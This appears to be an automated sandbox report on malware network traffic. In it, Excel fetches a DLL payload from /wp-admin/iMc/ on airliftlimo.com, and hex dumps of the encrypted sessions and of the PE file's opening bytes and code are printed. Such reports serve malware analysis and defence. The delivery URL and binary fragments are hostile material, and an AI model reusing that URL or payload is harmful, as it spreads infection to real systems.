                                                    2022-05-23 07:19:16 UTC291INData Raw: 33 61 39 0d 0a a2 39 65 e0 d7 34 54 39 6b 22 e9 b5 5e 30 6b 6a 7c 38 32 4d ba f3 76 41 24 5f 3d e2 17 58 67 e4 2d e3 dd 32 67 5a 51 e5 71 52 63 dd 68 46 66 58 ce 35 6f 30 69 93 fb 52 31 73 5f 8c cd c1 c3 9a dc 18 35 64 21 93 d4 a1 c6 94 ec 2c 24 2e 1d 09 2c 5e f0 23 c8 da 27 2a cd 71 ef f8 2d 7c 30 3e 78 2a 68 89 46 42 3a 52 ed 41 52 23 0d be 62 66 9f 01 56 0f ad 0a 77 43 a3 58 52 37 6b b4 41 18 0d 3d ac e2 7d 20 7a 24 16 f4 ce 2b a9 a5 56 30 6b 6a 59 c9 b9 55 30 76 66 aa 16 5f 79 e8 dd 48 2a 6f 2a 6d 85 d5 99 db e4 74 34 76 43 f6 ef 8e 34 9f 01 56 03 52 a9 f0 43 e9 78 52 3b 92 d6 f4 d6 60 ed 3f 43 01 a0 0e 00 31 6a 00 24 68 c7 cb 21 6a 6a 5e 7c 98 22 31 f7 e3 50 25 5f 79 f7 90 af d4 ee af 78 49 2a 66 80 fa 6c 35 fd c6 25 70 6a 66 d5 49 f2 a6 99 69 ea ce
                                                    Data Ascii: 3a99e4T9k"^0kj|82MvA$_=Xg-2gZQqRchFfX5o0iR1s_5d!,$.,^#'*q-|0>x*hFB:RAR#bfVwCXR7kA=} z$+V0kjYU0vf_yH*o*mt4vC4VRCxR;`?C1j$h!jj^|"1P%_yxI*fl5%pjfIi
                                                    2022-05-23 07:19:16 UTC292INData Raw: 33 37 65 64 0d 0a bc 5f 50 5f 0d c3 ef b9 d5 99 9d d4 74 34 76 43 cd 19 3f 66 15 ce b5 0c fd 72 62 43 62 1d ff da 7d 36 35 3c e4 d1 73 66 65 21 8f 12 fa 34 ac ae 78 01 4e 31 b5 81 70 48 fd e0 21 77 66 40 22 de cc 79 59 50 2b 42 63 0d 72 ab d3 4a 50 6c 35 c9 56 5c 4b e1 f3 48 44 72 67 f3 e7 7b 42 62 34 9e 7b 07 37 35 79 56 9b 22 ec a2 69 fb e0 ed 38 6b 2b 29 5f 0f 6f 2a 37 1f 14 63 13 6a 2b a5 8c e8 17 fa 85 40 97 6f 4b 22 58 fe 2a 66 69 91 20 be b7 ca 71 55 66 a1 1c 61 52 72 11 fb 63 c2 16 10 56 68 29 55 3e fd 09 40 4b 64 e4 55 5e 04 5d 64 19 2a e3 44 6a 11 e2 2e 7a 68 fb 09 15 46 37 59 4e 2e be 6d 7c 91 e8 25 4a af 0c 0e 4e 0a a2 04 ac b1 07 11 49 aa a5 82 3a b5 23 5c 4a e6 4d 35 34 b7 3b 41 17 3a bd 29 40 4b 2f 11 38 51 a5 21 1d 4b cf a5 57 e1 ba 2f 4e
                                                    Data Ascii: 37ed_P_t4vC?frbCb}65<sfe!4xN1pH!wf@"yYP+BcrJPl5V\KHDrg{Bb4{75yV"i8k+)_o*7cj+@oK"X*fi qUfaRrcVh)U>@KdU^]d*Dj.zhF7YN.m|%JNI:#\JM54;A:)@K/8Q!KW/N
                                                    2022-05-23 07:19:16 UTC306INData Raw: 31 39 33 62 0d 0a f8 2e 42 78 ce 3e 43 40 e1 67 67 51 fc 37 d6 6f f0 71 18 45 46 42 11 65 a0 3e 00 75 d0 f6 d4 97 81 3a 15 4b 8d f5 3a 3c c6 75 52 46 c9 60 7b 59 21 db 94 33 ac e6 a4 08 79 2e d9 bd 2c 7c fd 9b dd 73 82 99 a7 76 b2 2f f1 2e 47 6f eb 70 52 6b 2d bc 30 14 d9 64 6b a0 21 05 52 13 82 30 6b 63 ed c0 3b 6c ac 2e 7a 68 25 b0 78 76 df 54 e1 ce 39 28 e0 a0 34 10 7f 03 0c 0e 46 28 d8 28 11 56 c2 41 55 4a cc 58 b7 52 a0 3c 4e 0b 86 e2 7f 76 9e 09 13 5d 3b e4 10 4f 0f 9d 96 0d 69 d4 4d 4f 43 cc 9f a5 29 ea 1e 7a 20 e5 45 a2 23 ed 04 00 37 f2 2d 7c 70 c3 3e 78 68 48 62 ef 5f ef d7 35 76 0b be ba 22 e5 9c 05 29 2f 87 8a af 8f ae bd 22 7b 75 be 79 18 6d 31 38 31 32 60 2c 6c d8 95 4f 0b 94 ff b1 79 ea 86 ae 4c 3c 4d 79 fd d3 60 20 5f 79 5a 98 97 6e df d7
                                                    Data Ascii: 193b.Bx>C@ggQ7oqEFBe>u:K:<uRF`{Y!3y.,|sv/.GopRk-0dk!R0kc;l.zh%xvT9(4F((VAUJXR<Nv];OiMOC)z E#7-|p>xhHb_5v")/"{uym1812`,lOyL<My` _yZn
                                                    2022-05-23 07:19:16 UTC312INData Raw: 63 32 66 0d 0a 69 32 ad 11 1d 2b a0 ed a8 4d 31 6b e3 1a 6c 04 c6 b4 ce 65 40 24 17 f2 a2 d1 14 0f 5f a1 ed e8 29 66 5a 15 e7 71 52 13 be e4 da 65 58 45 fb 23 5c 42 8b 06 97 cb 89 98 e0 9f 36 3c 65 cd 54 ae 65 4a ff 8c 56 39 6b 43 e1 85 e6 32 6b 6a 9f e5 94 4e 31 76 76 c1 a9 f7 7a 69 58 0d cb 59 cb e9 fd 82 65 5a 51 1b c8 40 a2 f2 f4 ca 65 58 45 63 50 1e 6a 08 c6 c2 37 76 5f 4a be b0 9c 66 64 6b e6 e0 81 79 24 55 fc e2 d4 97 81 fb 91 68 6a 5e 43 2d 8d 23 fd f3 e0 27 5f 79 e2 d5 f8 28 6f 2a 24 c3 e9 8e 6e 35 6c 35 cd ee 0b 74 6a e7 a3 f6 0c 6e 78 65 e7 c9 99 cb 89 b6 c3 cd ca c3 a9 a8 23 e4 89 39 bd 60 71 19 e9 cc 62 00 89 75 4f 4a 26 da f5 4d 7d fd af 81 48 7b 59 63 d3 14 0f 4f 6e e5 4c 6a 27 9b b1 6f 71 ff 07 11 51 ab 02 7c 65 70 e6 0c 4e 43 de b1 28 76
                                                    Data Ascii: c2fi2+M1kle@$_)fZqReXE#\B6<eTeJV9kC2kjN1vvziXYeZQ@eXEcPj7v_Jfdky$Uhj^C-#'_y(o*$n5l5tjnxe#9`qbuOJ&M}H{YcOnLj'oqQ|epNC(v
                                                    2022-05-23 07:19:16 UTC315INData Raw: 63 30 35 0d 0a ee a4 b2 21 55 39 e2 6f 4c 28 c5 b4 b3 6f 5e 48 78 c6 bc a6 63 40 24 d4 35 4d 0c d9 6f 4b 0a 80 79 60 99 a5 d4 ac 3a f2 ec ce 8e 95 de 81 0d 7a 67 45 ce 12 49 62 3b f2 c0 9e c8 ca d5 2b 9e 94 98 25 74 32 a9 39 1d da 63 e9 ec 8e 31 6b 6a d5 0d 43 c4 75 52 46 a8 a6 9d 86 96 9f 15 14 13 ea 68 48 19 a6 12 d8 29 76 b1 06 42 67 87 2a 58 2e 37 10 44 e3 26 34 09 71 01 61 ec 72 42 bd 10 13 5e c6 62 55 f1 61 22 b0 2e c4 af 45 39 7d 36 ca 5e 23 79 3a 2d ff 23 37 9c d6 f1 e1 d0 db 66 18 dd 89 89 c0 62 d3 04 1b b4 03 34 8c 43 52 32 d3 00 05 ee 3d 4d a4 06 15 aa 0b 3d 65 b6 40 4b 8c 3d 5b 49 e4 54 0d b3 b4 f2 5d a0 2d 77 c7 74 98 ad 1b 3f d2 04 41 76 e7 05 53 93 e7 69 58 d1 5e 18 aa 47 81 fc ed 1f 26 e5 70 79 84 70 06 9f 4a 84 45 f3 22 0f 97 b3 43 62 b5
                                                    Data Ascii: c05!U9oL(o^Hxc@$5MoKy`:zgEIb;+%t29c1kjCuRFhH)vBg*X.7D&4qarB^bUa".E9}6^#y:-#7fb4CR2=M=e@K=[IT]-wt?AvSiX^G&pypJE"Cb
                                                    2022-05-23 07:19:16 UTC318INData Raw: 31 38 38 31 0d 0a e3 da c9 69 58 50 1b 4b 30 68 c9 af d6 5a 51 6c b7 73 bc ca fa e7 d6 58 45 72 90 99 d2 7c c6 89 65 b7 b5 63 be a0 8c 65 64 6b e6 d0 91 7a 24 55 4b 8f 2e 68 c7 cb 89 6b 6a 5e 22 2a fc 31 b7 c3 f8 24 5f 79 6e d3 dd 93 6f 2a 68 bf cb a7 b0 55 24 b8 32 67 0d f8 ff de 58 45 72 e6 cd d2 63 43 62 e0 e3 9c 6d b6 80 84 65 64 6b 8c 1a 27 73 e3 d0 f9 6b 2b 68 d1 f3 3f 6b 22 d7 0c 18 6d b0 c3 a6 40 24 5f eb d0 fa 3a aa da ea 68 48 2a eb ef fa 06 71 fd ce f5 71 6a 66 1c ce f7 df 78 6a 63 c8 f7 84 76 5f 65 bc b8 f4 65 64 6b 8f ca ed 87 db 14 81 39 3e 60 00 0f b0 93 78 58 46 3c 39 3d 9f 27 bd db a0 76 de 14 74 13 6c f3 e3 8b 62 e7 9e c9 6d 35 76 18 68 b2 22 ed 9c 0d fb 3f 68 22 ea 33 7a 7c ff 27 45 be 7d 34 30 2c e6 cf 8d d8 85 db 1d b8 87 3b 6f 00 4e
                                                    Data Ascii: 1881iXPK0hZQlsXEr|ecedkz$UK.hkj^"*1$_yno*hU$2gXErcCbmedk'sk+h?k"m@$_:hH*qqjfxjcv_eedk9>`xXF<9='vtlbm5vh"?h"3z|'E}40,;oN
                                                    2022-05-23 07:19:17 UTC324INData Raw: 63 39 65 0d 0a 76 d6 e4 67 37 3c 65 ef a8 2f e4 e5 02 26 55 39 34 75 33 5d 8d fd a7 e3 12 6c 34 05 b2 9a 4e 73 e4 98 3d 4d 18 fa bc 66 2a e1 0c 0e 22 12 da 69 9e 04 43 35 39 ef a6 2d 2e b5 23 5c 52 ec d4 44 34 ce d8 04 2f b3 7d dd 6e f0 92 05 aa 36 00 6d ce 8a 00 a2 d1 a7 32 a1 ab b7 4e b5 01 15 4e df fe a4 01 e1 e8 14 74 13 d8 a9 d0 18 ab 12 7e 69 f4 2f c7 13 f2 35 4e 56 02 48 7c 67 f9 1e 47 73 ac b2 ce a9 b4 53 11 0c e4 10 4f 57 f6 fd 19 c9 de 7d 4f 1b e3 44 6a 09 83 14 56 48 3c 05 b8 73 5d 32 24 5f 31 ea 9c 78 63 90 ca 20 c3 ee 2e d3 09 64 7d ff 2b 25 39 e3 16 40 12 3a e4 94 3a 2b c8 d6 10 ee 5f 65 37 7d b7 c9 40 fb 67 65 21 3b af 8c 71 e2 5b 88 48 c7 59 b3 e1 da 6c b4 4d 31 76 ef 04 00 77 f2 ed 7c d0 2b 6f 2a e3 b2 a3 22 7e 71 84 55 eb bc ca 39 e1 63
                                                    Data Ascii: c9evg7<e/&U94u3]l4Ns=Mf*"iC59-.#\RD4/}n6m2NNt~i/5NVH|gGsSOW}ODjVH<s]2$_1xc .d}+%9@::+_e7}@ge!;q[HYlM1vw|+o*"~qU9c
                                                    2022-05-23 07:19:17 UTC328INData Raw: 31 39 61 63 0d 0a 1f 86 31 16 1f 43 f4 1c bd 60 99 28 a5 6f f9 1f b4 10 5b 39 76 d4 20 e0 71 b7 20 bf e0 2a 1a a8 3e 00 75 d1 56 f4 96 ff f6 c6 35 68 5e a1 9f b3 ce 89 2e cb ea b7 a2 a0 a6 af a2 2c 22 d0 8e 4a 6d 5a b8 e2 cb 89 bc f2 34 b5 df cd 2e 72 df df 7a 0b 49 e9 79 a9 a8 84 1c ff ed 8c 67 a1 a6 8c 27 f3 69 8a b8 1e f4 bc 02 40 31 ac 2f 21 0a 12 ea 31 f7 23 3f 3f 6f 86 96 d9 15 54 02 1d 68 48 eb 0b 25 57 ed 40 09 03 8e 7e 6a a1 1d 9e 6a c4 d6 6a 08 06 b9 66 ff 1a be b6 78 e7 95 0c 74 40 e4 54 a1 a9 9a c2 5c ec 2d d7 ba 8b b7 6a 9f 2d eb 4b b0 33 b1 e0 ff 5f 79 e8 2d 87 81 5f 0e 5f c3 6f b1 d1 14 b7 be 33 3c be 34 b5 ed 13 4d 9a ce 5d 6a 63 0b eb 37 3e da a5 38 b1 09 64 64 6b df bf e5 78 24 bc d2 96 d4 97 48 c7 0a ac 2f 21 78 1a e7 31 f7 23 3f 93 39
                                                    Data Ascii: 19ac1C`(o[9v q *>uV5h^.,"JmZ4.rzIyg'i@1/!1#??oThH%W@~jjjfxt@T\-j-K3_y-__o3<4M]jc7>8ddkx$H/!x1#?9
                                                    2022-05-23 07:19:17 UTC334INData Raw: 31 31 30 62 0d 0a fa 2e 42 68 cc 36 43 48 e1 2f 67 5a bf 32 7b 25 04 fd 84 ec ec e3 ef 24 a8 72 e3 11 1d 5b 59 24 3d 4e ba 27 4e 6e bf dd 8c db 70 ef 14 00 6f f8 1d 7c 60 b1 65 cf 4b c9 6e 42 6a ec b0 35 76 c2 41 55 5a 64 66 a5 51 ec 3c 4e 53 ca 26 10 46 d4 29 13 7d b7 61 40 58 af 24 a8 73 e3 11 1d 5b c9 0b 4f 4e 5a 2f 4e 6e 16 b5 09 15 46 e7 34 00 6f 9b 9e 78 4d a0 2b 0e 58 c1 6e 42 6a 19 ef f1 5e 80 bc 25 4e 76 10 c6 9e 3f c2 6e 62 43 62 dc 0c 28 9a c8 f2 78 41 5c e2 de 63 21 49 e4 1d b0 2f 0f 54 89 0a 15 2f ad 1a 6c 54 1f 0d 04 66 c1 60 7b 11 b0 37 50 2b ee 5e 4c 20 6a 4e f7 0f ed 41 52 2b 73 09 b9 38 9f 01 56 57 c6 0f da 43 2e bd 32 7b 45 b6 79 18 55 5f 1e f2 9f a0 0e 00 65 b1 b8 92 92 44 c5 75 4f 5a d5 1c 18 25 d9 22 11 be db e7 78 69 58 50 63 ec ee
                                                    Data Ascii: 110b.Bh6CH/gZ2{%$r[Y$=N'Nnpo|`eKnBj5vAUZdfQ<NS&F)}a@X$s[ONZ/NnF4oxM+XnBj^%Nv?nbCb(xA\c!I/T/lTf`{7P+^L jNAR+s8VWC.2{EyU_eDuOZ%"xiXPc
                                                    2022-05-23 07:19:17 UTC338INData Raw: 31 33 38 32 0d 0a 95 2b c8 1f b4 45 9f a2 72 85 2e f6 67 6b a0 20 95 23 b5 53 39 ac 6e d0 9d 8f 33 6b e3 1b f4 b1 3d 30 cd 23 ee 2f 5f f8 92 1a 8f 2d 6f 25 ec bd 2c 66 5a d0 97 e3 fa 44 35 7e ee 2f 5e 45 72 e6 83 02 90 4a 62 3b f2 8f 61 37 35 bd 9e 81 e2 6c 65 2e fe cf 57 39 6b aa 93 45 e0 3a 6b 65 da da 3e 4d 31 f7 9d 68 03 53 79 66 dc 97 2b 6f 2a e9 b3 50 4c 54 51 63 b0 15 44 35 71 ad 22 7c 35 22 77 44 6a 2b ce 37 a4 3b d4 aa f6 59 18 15 61 2a ec a9 e0 16 00 25 3b ea 5f 4c 70 66 54 6c 6a 99 0c 18 35 22 ac 4e 40 e5 33 5d 11 5d d1 67 4b 52 47 4a 56 e5 9b 3d 48 4d 73 c2 41 55 12 02 e2 56 76 a0 3c 4e 17 d8 04 0b 76 de 11 13 41 68 9f 46 2b e6 11 05 0e fe 97 28 2b ec 2c 24 32 b6 52 43 5e c9 78 69 4d df 45 bf db 34 3d 4d 24 08 a2 2b 0e 14 c9 5e 42 26 c3 5d c6
                                                    Data Ascii: 1382+Er.gk #S9n3k=0#/_-o%,fZD5~/^ErJb;a75le.W9kE:ke>M1hSyf+o*PLTQcD5q"|5"wDj+7;Ya*%;_LpfTlj5"N@3]]gKRGJV=HMsAUVv<NvAhF+(+,$2RC^xiME4=M$+^B&]
                                                    2022-05-23 07:19:17 UTC343INData Raw: 63 33 62 0d 0a 77 43 35 71 22 ef 5f ce 37 50 f1 2d 6b 0f ef a8 52 af 65 37 35 b7 a6 2d e0 3c 75 68 f1 57 4d 70 e0 50 48 49 c5 d2 36 a9 16 cb d0 65 f6 32 42 48 ed 95 77 69 9f 14 0f 63 48 5c 46 2a a1 1e 75 7c 16 b8 48 35 b6 2e 42 4c 10 cf 6a 78 ad 27 67 52 7f df 94 65 7b be fd e4 20 4f 57 50 9c 85 db d4 7d 4f 1b 68 8f 4e 31 ea 1e 7a 78 fb 70 f8 76 ed 04 00 6f f0 2d 7c 60 ec 2b 0e 28 41 de 99 78 96 68 11 8a bf 3c 06 ad 22 7c 7d 1c 17 75 52 a4 07 46 7c 8b a3 fc 5f f2 78 41 54 12 69 f8 21 11 60 71 09 3e a2 2c 24 7e b0 27 4e 6e f0 c4 6a f5 f7 12 64 14 a5 4f 4c ac db 6f 4b 1a e1 0c 0e 56 d1 1d 48 0d fd 07 11 31 59 ae 19 cc 7a a0 3c 4e 53 fa ba a8 76 de 11 13 05 ef 81 44 05 e6 11 05 4a 09 a1 87 05 a0 2c 24 7e b8 2f 4e 6e c3 70 69 79 fd 62 64 17 97 f0 63 9f 14 0f
                                                    Data Ascii: c3bwC5q"_7P-kRe75-<uhWMpPHI6e2BHwicH\F*u|H5.BLjx'gRe{ OWP}OhN1zxpvo-|`+(Axh<"|}uRF|_xATi!`q>,$~'NnjdOLoKVH1Yz<NSvDJ,$~/Nnpiybdc
                                                    2022-05-23 07:19:17 UTC346INData Raw: 63 32 33 0d 0a 7b 45 4f 62 3b f9 18 67 37 35 33 e1 fa 6d 67 65 a0 81 8d b2 3c 6b 24 ec 2b 4c 31 6b eb a5 7d 05 4b 31 79 e2 c9 25 5f 79 e8 a3 61 1f 68 2a 67 cc e2 66 5a 51 ed ce 22 dd 32 71 65 e2 fa 45 72 67 f9 91 10 94 6a 34 79 da 30 31 35 3c a2 21 98 61 7d 80 7a 9c 5c f2 56 a6 25 8b 8b f0 0e 99 55 c9 71 be a7 10 39 15 af 12 8a 9e b9 91 c1 6b a3 3d bb ab 13 a9 80 c7 09 75 84 70 9e 32 39 b5 45 f3 22 97 28 46 bc 9d b5 33 b0 5c 3c ca c3 e4 11 84 f2 65 cc 7a e3 10 ce d1 61 31 00 8f 5c 9c 6f df 3d cb 62 cd 75 66 04 af 12 8a 21 d3 57 a0 3a dd e3 05 c5 2e d3 15 48 15 9e d3 88 8c 95 2a d3 a5 3a 90 a0 71 b8 c2 81 a3 80 5a 65 b6 f6 68 fb 63 6b 23 ee 64 7d 68 de 6c 0c 6f e3 4d 45 d8 77 95 a1 b7 74 ce f6 4e 2f 7b db 44 a2 e8 bb d0 87 94 d5 e9 8b d9 4c 57 51 85 37 89
                                                    Data Ascii: c23{EOb;g753mge<k$+L1k}K1y%_yah*gfZQ"2qeErgj4y015<!a}z\V%Uq9k=up29E"(F3\<eza1\o=buf!W:.H*:qZehck#d}hloMEwtN/{DLWQ7
                                                    2022-05-23 07:19:17 UTC349INData Raw: 32 31 64 32 0d 0a ba 35 67 a3 3a a1 67 16 54 25 79 37 78 6a 62 66 69 34 53 6b 47 37 10 3d 7d 64 71 97 7d c1 6c f4 41 f9 79 5b 79 60 5e 61 6b 6a 5f 52 35 4d 2b 12 46 40 3e 6b 67 69 42 51 31 6f 24 88 44 5a 6d 0a 51 6c 34 62 4b 35 65 0e 68 58 51 26 6a 78 7e 57 4f 62 20 e4 4f 15 36 2c 38 65 7d 6a 28 65 2b 4a 2d 05 38 70 22 68 1b 3a 11 6b 71 3a 57 3c 56 05 68 66 5b 25 43 79 79 08 50 2b 6e 20 6c 48 20 52 52 51 66 67 70 33 34 6a 6c 66 43 44 e3 67 74 1a 68 23 68 04 7f 0f 64 2b 39 3c 79 00 78 67 79 75 68 24 49 0d 7b 2b 74 92 56 c1 7d 8a 4a 98 2e 8d 21 06 67 5f 2c 5f 66 68 fd 50 3b 9f 24 88 44 5a 6d 3a 5b 5c 3c 26 42 21 75 6a 72 6c 4c 72 73 2a 7a 13 42 7b 33 76 46 64 03 35 36 85 6c 1b 60 05 27 4a 21 05 39 6b 2a 7c 04 4e 25 5f 62 5e 5c 6e 5d 41 77 71 46 24 48 1d 60
                                                    Data Ascii: 21d25g:gT%y7xjbfi4SkG7=}dq}lAy[y`^akj_R5M+F@>kgiBQ1o$DZmQl4bK5ehXQ&jx~WOb O6,8e}j(e+J-8p"h:kq:W<Vhf[%CyyP+n lH RRQfgp34jlfCDgth#hd+9<yxgyuh$I{+tV}J.!g_,_fhP;$DZm:[\<&B!ujrlLrs*zB{3vFd56l`'J!9k*|N%_b^\n]AwqF$H`
                                                    2022-05-23 07:19:17 UTC358INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.2249174159.203.19.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    2022-05-23 07:19:25 UTC358OUTGET /wp-admin/iMc/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: airliftlimo.com
                                                    Connection: Keep-Alive
                                                    2022-05-23 07:19:25 UTC358INHTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:21 GMT
                                                    Server: Apache/2
                                                    Set-Cookie: 628b35791d77a=1653290361; expires=Mon, 23-May-2022 07:20:21 GMT; Max-Age=60; path=/
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Last-Modified: Mon, 23 May 2022 07:19:21 GMT
                                                    Expires: Mon, 23 May 2022 07:19:21 GMT
                                                    Content-Disposition: attachment; filename="klJrMZJhgldiJr6j0XWPeZOiGs.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Content-Length: 365056
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
                                                    2022-05-23 07:19:25 UTC359INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b"
                                                    2022-05-23 07:19:25 UTC366INData Raw: df c7 85 b4 08 00 00 65 37 35 d7 c7 85 b8 08 00 00 40 20 e0 e2 c7 85 bc 08 00 00 7d 20 7a 24 c7 85 c0 08 00 00 be 1a ee e2 c7 85 c4 08 00 00 1d 06 0a bc c7 85 c8 08 00 00 2a 4a b5 5a c7 85 cc 08 00 00 78 c6 b4 6e c7 85 d0 08 00 00 67 40 24 da c7 85 d4 08 00 00 b0 d1 18 50 c7 85 d8 08 00 00 2b 6f 6e 67 c7 85 dc 08 00 00 0d ea 22 d3 c7 85 e0 08 00 00 d4 74 34 76 c7 85 e4 08 00 00 43 c2 77 6a c7 85 e8 08 00 00 66 58 41 06 c7 85 ec 08 00 00 6b 39 65 d9 c7 85 f0 08 00 00 ab 6b 70 ff c7 85 f4 08 00 00 da 7d 36 35 c7 85 f8 08 00 00 3c ee 2a 83 c7 85 fc 08 00 00 2b e8 ac 62 c7 85 00 09 00 00 25 55 39 e0 c7 85 04 09 00 00 7d 84 48 4d c7 85 08 09 00 00 fa 94 3f 6e c7 85 0c 09 00 00 47 8b 0a 37 c7 85 10 09 00 00 33 65 b4 6c c7 85 14 09 00 00 dc bf 41 1c c7 85 18 09
                                                    Data Ascii: e75@ } z$*JZxng@$P+ong"t4vCwjfXAk9ekp}65<*+b%U9}HM?nG73elA
                                                    2022-05-23 07:19:25 UTC382INData Raw: 75 03 cc 33 c0 48 8b 44 24 40 8b 40 28 89 44 24 28 48 8d 05 5d c9 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 f5 42 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 04 0f 85 a9 00 00 00 48 8b 44 24 40 8b 40 1c c1 f8 10 25 ff ff 00 00 48 8b 4c 24 40 48 83 c1 30 48 8b 54 24 40 48 8b 52 20 48 89 54 24 38 89 44 24 30 48 89 4c 24 28 48 8d 05 c0 c8 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 8c 42 00 00 83 f8 01 75 03 cc 33 c0 48 83 3d 04 5f 02 00 00 74 38 48 8b 44 24 40 48 83 c0 30 ba 01 00 00 00 48 8b c8 ff 15 4b b6 01 00 85 c0 75 1d 48 8b 44 24 40 48 83 c0 30 48 8b 4c 24 40 48 8b 51 20 48 8b c8 ff 15 cc 5e 02 00 eb 0f 48 8b 54 24 40 48 8b 4c 24 68 e8 23 01 00 00 e9 cf 00 00 00 48 8b 44 24 40 83 78 1c 01 75 50 48
                                                    Data Ascii: u3HD$@@(D$(H]HD$ E3E333Bu3HD$@@%HD$@@%HL$@H0HT$@HR HT$8D$0HL$(HHD$ E3E333Bu3H=_t8HD$@H0HKuHD$@H0HL$@HQ H^HT$@HL$h#HD$@xuPH
                                                    2022-05-23 07:19:25 UTC398INData Raw: 44 0a 1c 8b 84 24 70 05 00 00 83 e8 20 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 88 84 0a 1d 01 00 00 eb 17 8b 84 24 70 05 00 00 48 8b 8c 24 b0 05 00 00 c6 84 01 1d 01 00 00 00 e9 f3 fe ff ff 48 8b 8c 24 90 05 00 00 48 33 cc e8 50 88 ff ff 48 81 c4 a8 05 00 00 c3 cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 2d 3d 02 00 00 75 14 b9 fd ff ff ff e8 b9 f1 ff ff c7 05 17 3d 02 00 01 00 00 00 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 e8 e3 00 00 00 8b 4c 24 40 89 08 8b 4c 24 40 e8 14 00 00 00 89 44 24 20 e8 9b 00 00 00 8b 4c 24 20 89 08 48 83 c4 38 c3 89 4c 24 08 48 83 ec 18 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 48 63 04 24 48 83 f8 2d 73 27 48 63 04 24 48 8d 0d 92 11 02 00 8b 04 c1 39 44 24 20 75 11 48 63 04 24 48 8d 0d
                                                    Data Ascii: D$p $pH$$pH$H$H3PHH(=-=u=3H(L$H8L$@L$@D$ L$ H8L$H$$$Hc$H-s'Hc$H9D$ uHc$H
                                                    2022-05-23 07:19:25 UTC414INData Raw: 84 24 90 00 00 00 48 89 44 24 48 e8 11 56 ff ff 48 8b 80 e0 00 00 00 48 89 44 24 58 48 8d 54 24 40 48 8b 84 24 80 00 00 00 8b 08 ff 54 24 58 c7 44 24 50 00 00 00 00 eb 00 8b 44 24 50 48 83 c4 78 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 c7 44 24 38 00 00 00 00 48 8b 44 24 58 8b 40 0c 89 44 24 28 48 8b 94 24 80 00 00 00 48 8b 4c 24 58 e8 d1 50 00 00 89 44 24 30 83 7c 24 28 00 76 02 eb 05 e8 ff e4 ff ff 48 8b 44 24 78 c7 00 ff ff ff ff 48 8b 44 24 70 c7 00 ff ff ff ff 8b 44 24 28 89 44 24 2c eb 0a 8b 44 24 2c ff c8 89 44 24 2c 83 7c 24 2c 00 76 4f 48 8b 44 24 58 48 63 40 10 48 8b 8c 24 80 00 00 00 48 8b 49 08 48 03 c8 48 8b c1 8b 4c 24 2c ff c9 8b c9 48 6b c9 14 48 03 c1 48 89
                                                    Data Ascii: $HD$HVHHD$XHT$@H$T$XD$PD$PHxDL$ DD$HT$HL$HHHD$8HD$X@D$(H$HL$XPD$0|$(vHD$xHD$pD$(D$,D$,D$,|$,vOHD$XHc@H$HIHHL$,HkHH
                                                    2022-05-23 07:19:25 UTC430INData Raw: 00 00 00 00 8b 44 24 60 89 44 24 40 83 7c 24 40 00 75 2e 48 8d 05 a7 4a 01 00 48 89 44 24 20 45 33 c9 41 b8 42 01 00 00 48 8d 15 b2 49 01 00 b9 02 00 00 00 e8 98 89 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 3e e8 04 81 ff ff c7 00 22 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 42 01 00 00 4c 8d 05 78 49 01 00 48 8d 15 09 4b 01 00 48 8d 0d 4a 4a 01 00 e8 15 93 ff ff b8 ff ff ff ff e9 ca 00 00 00 b8 ff ff ff ff e9 c0 00 00 00 48 83 bc 24 98 00 00 00 ff 0f 84 94 00 00 00 48 81 bc 24 98 00 00 00 ff ff ff 7f 0f 84 82 00 00 00 8b 44 24 30 ff c0 48 98 48 3b 84 24 98 00 00 00 73 70 8b 44 24 30 ff c0 48 98 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b 